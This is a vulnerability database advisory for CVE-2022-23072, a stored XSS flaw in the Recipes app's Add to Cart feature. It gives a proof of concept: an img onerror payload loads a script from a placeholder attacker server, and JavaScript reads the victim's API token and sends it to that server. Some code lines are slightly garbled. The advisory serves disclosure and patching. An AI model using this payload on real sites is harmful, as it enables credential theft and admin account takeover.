Headline
CVE-2022-23072: Mend Vulnerability Database
In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cartâ€? functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.
CVE-2022-23072
Date: January 11, 2022
Overview
In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.
Details
In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.
PoC Details
Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus ‘+’ icon. Under the name input field, enter the XSS payload given in the “POC Code” section below and save it. Then host the JavaScript file for fetching the victim’s API (the code for the JavaScript file can be found in the “POC Code” section below). In a new browser window, login as administrator and access the food list page. Now, click on the add to shopping cart icon, this will trigger the XSS payload and the attacker will receive the admin’s API key in the listener on the attacker hosting port.
PoC Code
XSS payload:
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">
JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/settings/',true);
req.send();
function handleResponse() {
t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
t a=a.split("Token ")[1];
t a=a.split("<")[0];
t console.log(a);
t var changeReq = new XMLHttpRequest();
changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
changeReq.send()
Affected Environments
1.0.5 through 1.2.5
Prevention
Update version to 1.2.6 or higher
Language: Python
Good to know:
- Severity Score
- Weakness Type (CWE)
- Top Fix
Cross-Site Scripting (XSS)
CWE-79
****Upgrade Version****
Upgrade to version 1.2.6
Learn More
- CVSS v3.1
Base Score:
5.4
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality ©:
Low
Integrity (I):
Low
Availability (A):
None
Related Resources (3)